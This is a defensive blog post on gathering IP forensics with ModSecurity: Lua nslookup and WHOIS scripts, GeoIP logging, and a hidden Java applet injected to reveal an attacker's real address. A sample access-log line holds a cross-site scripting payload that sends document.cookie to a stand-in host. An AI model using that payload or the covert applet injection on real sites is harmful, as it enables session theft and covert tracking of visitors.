This week's installment of Detecting Malice with ModSecurity will discuss the value of obtaining data about client IP Addresses.
From the IP forensics section of Robert "RSnake" Hansen's book "Detecting Malice":
Whenever someone connects to your server you get their IP address. Technically speaking, this piece of information is very reliable--because of the three-way handshake, which I discussed in Chapter 1, an IP address used in a full TCP/IP connection typically cannot be spoofed. That may not matter much because, as this chapter will show, there are many ways for attackers to hide their tracks and connect to our servers not from their real IP addresses, but from addresses they will use as mere pawns in the game.
Almost the first thing people inquire into when they encounter computer crime is the location of the attacker. They want to know who the attacker is, where he is, and where he came from. These are all reasonable things to latch onto; but not always the first thing that comes to my mind.
I have a pretty particular way I like to think about IP addresses and forensics in particular. I am very practical. I want to find as much as I can, but only to the extent that whatever effort is spent toward uncovering the additional information is actually helpful. The goal of recording and knowing an offending IP address is to use it to determine intent of the attacker, and his motivation—is he politically, socially or monetarily motivated? Everything else comes at the end, and then only if you really need to catch the bad guy.
..snip..
Many attackers have failed to learn their lesson, either because of ignorance or stupidity and hack from their house. Although getting warrants for arrest can be time consuming, costly and difficult, it's still possible and if you can narrow down an attacker's IP address to a single location that will make the process much easier. Techniques such as reverse DNS resolution, WHOIS, and geolocation are commonly used to uncover useful real-world information on IP addresses.
Reverse DNS Resolution
One of the most useful tools in your arsenal can be to do a simple DNS resolution against the IP address of the attacker (retrieving the name associated with an IP address is known as reverse DNS resolution). Sometimes you can see the real name of the owner of the broadband provider.
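For readers who have not seen how a reverse lookup is phrased on the wire, here is a minimal Lua sketch of how an IPv4 address maps to the PTR name that gets queried. The function name reverse_name is hypothetical and only serves this illustration; it handles IPv4 only and performs no DNS query itself.

```lua
-- Build the PTR query name for a dotted-quad IPv4 address.
-- Returns nil when the input is not a well-formed IPv4 address.
local function reverse_name(ip)
  if type(ip) ~= "string" then return nil end
  local a, b, c, d = string.match(ip, "^(%d+)%.(%d+)%.(%d+)%.(%d+)$")
  if not a then return nil end
  for _, octet in ipairs({a, b, c, d}) do
    if tonumber(octet) > 255 then return nil end
  end
  -- The octets are reversed and placed under the in-addr.arpa zone.
  return d .. "." .. c .. "." .. b .. "." .. a .. ".in-addr.arpa"
end

print(reverse_name("156.17.1.5"))  -- 5.1.17.156.in-addr.arpa
```

Tools such as nslookup build this name for you when handed a bare IP address.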
WHOIS Database
Whois is a protocol that supports lookups against domain name, IP address and autonomous system number databases. If reverse DNS lookup provides little useful information, you can try running the whois command on the same IP address in order to retrieve the official owner information. You may get very interesting results. Sometimes it is possible to retrieve the actual name of the person or company at that IP address.
Gathering IP Data in ModSecurity
You can use the REMOTE_HOST variable in ModSecurity to log the client's registered DNS name. The problem is that this variable only contains data if Apache has been configured with HostnameLookups On. This is not the default, because performing a DNS lookup for every client carries a significant performance cost. So, how can we gather client hostname information without incurring that overall performance hit?
Conditional Hostname Lookups in Lua
Lua to the rescue! If you use the following Lua script, you can conditionally execute an nslookup on the client IP address at the end of the transaction (in the logging phase) and log the data to the ModSecurity audit_log file only when the client's anomaly score is above your defined level. Here is an example line calling up the script:
SecRuleScript gather_ip_data.lua "phase:5,t:none,pass"
Here is the example code:
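#!/opt/local/bin/lua
require("io");

function main()
  -- TX.ANOMALY_SCORE is nil when no rule has set a score for this transaction.
  -- This only checks that a score exists; compare it to your own threshold if needed.
  local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none");
  -- Use the connection address; a request parameter would be client-controlled.
  local remote_addr = m.getvar("REMOTE_ADDR", "none");
  local remote_hostname = nil;

  if anomaly_score ~= nil and remote_addr ~= nil then
    local n = os.tmpname()
    os.execute("nslookup '" .. remote_addr .. "' > " .. n)

    for line in io.lines(n) do
      -- Keep the first PTR answer line.
      if remote_hostname == nil and string.match(line, "name = ") then
        remote_hostname = line
      end
    end
    -- Remove the temp file before returning so it is never left behind.
    os.remove(n)
  end

  if remote_hostname ~= nil then
    return("Remote Hostname is: " .. remote_hostname .. ".");
  end
  return nil;
end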
This will add a new message to the ModSecurity audit log like this:
Message: Warning. Remote Hostname is: 5.1.17.156.in-addr.arpa name = marcin.wcss.wroc.pl.. [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"]
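Because the script interpolates the address into a shell command and logs the raw nslookup line, two small helpers may be worth adding. The following is a sketch only: is_ipv4 and ptr_hostname are hypothetical names, not part of ModSecurity, and the check is IPv4-only (an IPv6 client would be rejected by it).

```lua
-- Accept only dotted-quad IPv4 text, so nothing else can reach the shell.
local function is_ipv4(s)
  if type(s) ~= "string" then return false end
  local a, b, c, d =
    s:match("^(%d%d?%d?)%.(%d%d?%d?)%.(%d%d?%d?)%.(%d%d?%d?)$")
  if not a then return false end
  return tonumber(a) <= 255 and tonumber(b) <= 255
     and tonumber(c) <= 255 and tonumber(d) <= 255
end

-- Pull the bare hostname out of an nslookup answer line such as
-- "5.1.17.156.in-addr.arpa name = marcin.wcss.wroc.pl."
local function ptr_hostname(line)
  local host = line:match("name = (%S+)")
  if not host then return nil end
  return (host:gsub("%.$", ""))  -- drop the trailing root dot
end

print(is_ipv4("156.17.1.5"))
print(ptr_hostname("5.1.17.156.in-addr.arpa name = marcin.wcss.wroc.pl."))
```

In the script, is_ipv4(remote_addr) would gate the os.execute call, and ptr_hostname(line) would replace the raw line in the returned message.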
Adding WHOIS Data
In addition to the Nslookup data, you could also easily add in WHOIS data such as the Abuse contact info:
#!/opt/local/bin/lua
require("io");

function main()
  local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none");
  -- tostring() keeps the log calls from failing when a variable is nil.
  m.log(4, "Anomaly Score is: " .. tostring(anomaly_score) .. ".");
  -- Use the connection address; a request parameter would be client-controlled.
  local remote_addr = m.getvar("REMOTE_ADDR", "none");
  m.log(4, "Remote IP is: " .. tostring(remote_addr) .. ".");

  if anomaly_score ~= nil and remote_addr ~= nil then
    -- Defaults keep the final concatenation from failing when a lookup returns nothing.
    local hostname = "unknown"
    local abuse_contact = "unknown"
    local n = os.tmpname()
    os.execute("nslookup '" .. remote_addr .. "' > " .. n)
    os.execute("whois '" .. remote_addr .. "' >> " .. n)

    for line in io.lines(n) do
      if string.match(line, "name = ") then
        hostname = line
        m.log(4, "Hostname is: " .. hostname .. ".");
        -- m.setvar("tx.hostname", hostname);
      end
      if string.match(line, "abuse") then
        abuse_contact = line
        m.log(4, "Abuse Contact is: " .. abuse_contact .. ".");
        -- m.setvar("tx.abuse_contact", abuse_contact);
      end
    end
    os.remove(n)

    return("Nslookup: " .. hostname .. " and WHOIS Abuse Info: " .. abuse_contact);
  end

  return nil;
end
This would result in the following extra data:
Message: Nslookup: 5.1.17.156.in-addr.arpa name = marcin.wcss.wroc.pl. and WHOIS Abuse Info: remarks: abuse complaints to: abuse@wask.wroc.pl [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "1"]
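The WHOIS line above carries more text than the contact itself. If you only want the e-mail address, a pattern match along the following lines could be used. This is a rough sketch: abuse_email is a hypothetical helper, and the pattern is deliberately loose rather than a full e-mail address validator.

```lua
-- Return the first e-mail-looking token from a WHOIS line that mentions
-- "abuse", or nil when the line is unrelated or holds no address.
local function abuse_email(line)
  if not line:lower():find("abuse", 1, true) then return nil end
  return line:match("[%w%.%-_%+]+@[%w%.%-]+%.%a+")
end

print(abuse_email("remarks: abuse complaints to: abuse@wask.wroc.pl"))
```

WHOIS output formats differ between registries, so treat whatever this returns as a hint to verify by hand.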
Only Do DNS Lookups Once a Day
In order to keep the performance hit to a minimum, it will be possible (with the soon-to-be-released ModSecurity v2.5.13) to use setvar from within Lua. This means that we can take the resolved client hostname data and save it to an IP persistent collection that will expire after 24 hours. Here are the updated SecRules:
SecRuleScript gather_ip_data.lua "phase:5,t:none,pass,setvar:ip.hostname=%{tx.hostname},expirevar:ip.hostname=86400,skip:1"
SecRule TX:ANOMALY_SCORE "@gt 5" "phase:5,t:none,pass,log,msg:'Client Hostname Resolution.',logdata:'%{ip.hostname}'"
So the logic is that if it is the first time that we are seeing this client, then the Lua script will handle doing the IP resolution and alerting/saving the hostname in the IP collection. If it is not the first time, then the Lua script does not do the Nslookup/WHOIS lookups. This data is instead taken from the saved IP collection data and logged in a new SecRule. And here is the updated Lua script:
#!/opt/local/bin/lua
require("io");

function main()
  local anomaly_score = m.getvar("TX.ANOMALY_SCORE", "none");
  -- Use the connection address; a request parameter would be client-controlled.
  local remote_addr = m.getvar("REMOTE_ADDR", "none");
  -- ip_hostname is nil until a previous lookup has been saved for this client.
  local ip_hostname = m.getvar("IP.HOSTNAME", "none");

  if anomaly_score ~= nil and ip_hostname == nil and remote_addr ~= nil then
    -- Defaults keep the final concatenation from failing when a lookup returns nothing.
    local hostname = "unknown"
    local abuse_contact = "unknown"
    local n = os.tmpname()
    os.execute("nslookup '" .. remote_addr .. "' > " .. n)
    os.execute("whois '" .. remote_addr .. "' >> " .. n)

    for line in io.lines(n) do
      if string.match(line, "name = ") then
        hostname = line
        m.log(4, "Hostname is: " .. hostname .. ".");
        -- Expose the result to the rule, which copies it into ip.hostname.
        m.setvar("tx.hostname", hostname);
      end
      if string.match(line, "abuse") then
        abuse_contact = line
        m.log(4, "Abuse Contact is: " .. abuse_contact .. ".");
      end
    end
    os.remove(n)

    return("Nslookup: " .. hostname .. " and WHOIS Abuse Info: " .. abuse_contact);
  end

  return nil;
end
Don't Forget the GeoLocation Data
In last week's blog post, I highlighted how to use ModSecurity's GeoIP data for use in potential fraud detection scoring. In addition to fraud scoring, you can also use the GEO data in the same type of post-processing IP forensic data gathering. You can use the same logic where you check the overall anomaly score and if it is above a defined threshold, then you simply log the already gathered GEO data to the audit log file. Here is an example SecRule:
SecGeoLookupDb /usr/local/apache/conf/modsec_current/base_rules/GeoLiteCity.dat
SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass,setvar:ip.geo_country_code=%{geo.country_code}"
SecRule TX:ANOMALY_SCORE "@gt 5" "phase:5,t:none,log,id:'1',severity:'5',msg:'Logging GeoIP Data due to high anomaly score.',logdata:'{country_code=%{geo.country_code}, country_code3=%{geo.country_code3}, country_name=%{geo.country_name}, country_continent=%{geo.country_continent}, city=%{geo.city}'"
The resulting ModSecurity message would contain the GeoIP data:
[Wed Nov 03 14:09:10 2010] [error] [client ::1] ModSecurity: Warning. Operator GT matched 5 at TX:anomaly_score. [file "/usr/local/apache/conf/modsec_current/base_rules/modsecurity_crs_15_customrules.conf"] [line "40"] [id "1"] [msg "Logging GeoIP Data due to high anomaly score."] [data "{country_code=PL, country_code3=POL, country_name=Poland, country_continent=EU, city=Wroclaw"] [severity "NOTICE"] [hostname "localhost"] [uri "/cgi-bin/printenv"] [unique_id "TNGlRsCoAWcAAI5SGRMAAABA"]
Identifying Real IP Addresses of Web Attackers
One of the biggest challenges of doing incident response during web attacks is tracing the source IP address information back to the "real" attacker's computer. This is so challenging because attackers almost always loop their attacks through numerous open proxy servers or other compromised hosts where they set up connection tunnels. This means that the IP address that shows up in the victim's logs is most likely only the last hop between the attacker and the target site. One way to tackle this problem is, instead of relying on the TCP/IP address information of the connection, to handle it at the HTTP layer.
Web security researchers (such as Jeremiah Grossman) have conducted quite a bit of research in the area of how blackhats can send malicious JavaScript/Java to clients. Once the code executes, it can obtain the client's real (internal NAT) IP address. With this information, the JavaScript code can do all sorts of interesting things, such as port scanning the internal network. In our scenario, the client is not an innocent victim but a malicious client who is attacking our site. The idea is that the code we send to the client will execute locally, grab the client's real IP address and then post the data back to a URL on our site. With this data, we can then perhaps initiate a brand new incident response engagement focusing on the actual origin of the attacks!
The following rule uses the same data as the previous example, except this time, instead of simply sending an alert pop-up box, we are sending the MyAddress.class Java applet. This code will force the attacker's browser to initiate a connection back to our web server. Note that the prepend action only works when content injection is enabled (SecContentInjection On).
SecRule TX:ALERT "@eq 1" "phase:3,nolog,pass,chain,prepend:'<APPLET CODE=\"MyAddress.class\" MAYSCRIPT WIDTH=0 HEIGHT=0> <PARAM NAME=\"URL\" VALUE=\"grab_ip.php?IP=\"> <PARAM NAME=\"ACTION\" VALUE=\"AUTO\"></APPLET>'"
SecRule RESPONSE_CONTENT_TYPE "^text/html"
So, if an attacker sends a malicious request that ModSecurity triggers on, this rule will then fire and it will send the injected code to the client. Our Apache access_logs will show data similar to this:
203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/foo.cgi?param=<script>document.write('<img%20 src="http://hackersite/'+document.cookie+'"')</script> HTTP/1.1" 500 676
203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] "GET /cgi-bin/grab_ip.php?IP=222.141.50.175 HTTP/1.1" 404 207
As you can see, even though the IP address in the access_logs shows 203.160.1.47, the data returned in the QUERY_STRING portion of the second line shows that the real IP address of the attacker is 222.141.50.175. This would mean that in this case, the attacker's system was not on a private network (perhaps just connecting their computer directly to the internet). In this case, you would be able to obtain the actual IP of an attacker who was conducting a manual attack with a browser.
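If you want to spot these callbacks in the access log automatically, the comparison described above can be sketched in a few lines of Lua. The helper name callback_ips is hypothetical, and the pattern assumes the grab_ip.php?IP= URL used in this example. Keep in mind that the reported address is supplied by the client and could be forged.

```lua
-- From one access_log line, return the connecting address, the address
-- reported in the grab_ip.php callback, and whether the two differ.
-- Returns nil for lines that are not callback requests.
local function callback_ips(log_line)
  local client = log_line:match("^(%S+)")
  local reported = log_line:match("grab_ip%.php%?IP=([%d%.]+)")
  if not client or not reported then return nil end
  return client, reported, client ~= reported
end

local line = '203.160.1.47 - - [20/Jan/2008:21:15:03 -0500] '
  .. '"GET /cgi-bin/grab_ip.php?IP=222.141.50.175 HTTP/1.1" 404 207'
print(callback_ips(line))
```

A mismatch between the two addresses is the signal that the request probably passed through a proxy.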
Attacker -> Proxy -> ... -> Proxy -> Target Website.
   ^                          ^
222.141.50.175          203.160.1.47
This example is extremely experimental. As noted above, if the attacker were behind a router (on a private LAN), the reported address would probably have been in a private range such as 192.168.xxx.xxx.
Attacker -> Firewall/Router -> ... -> Proxy -> Target Website.
   ^                                    ^
192.168.1.100                     203.160.1.47
This type of data would not be as useful for our purposes as it wouldn't help for a traceback.
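To decide quickly whether a reported address is worth following up, you could test it against the RFC 1918 private ranges (10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16). A minimal sketch follows; is_private_ipv4 is a hypothetical helper, covers IPv4 only, and assumes the input was already checked to be a well-formed address.

```lua
-- True when the dotted-quad address falls in an RFC 1918 private range.
local function is_private_ipv4(ip)
  local a, b = ip:match("^(%d+)%.(%d+)%.%d+%.%d+$")
  if not a then return false end
  a, b = tonumber(a), tonumber(b)
  return a == 10
      or (a == 172 and b >= 16 and b <= 31)
      or (a == 192 and b == 168)
end

print(is_private_ipv4("192.168.1.100"))
print(is_private_ipv4("222.141.50.175"))
```

An address that tests as private tells you the attacker sits behind NAT, but not where.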
Since the majority of web attacks are automated, odds are that the application sending the exploit payload is not actually a browser but some sort of scripting client. In that case, the JavaScript/Java code would never execute.
Hopefully this blog post has provided some examples that will help you to gather critical IP address data that may assist you with incident response tasks.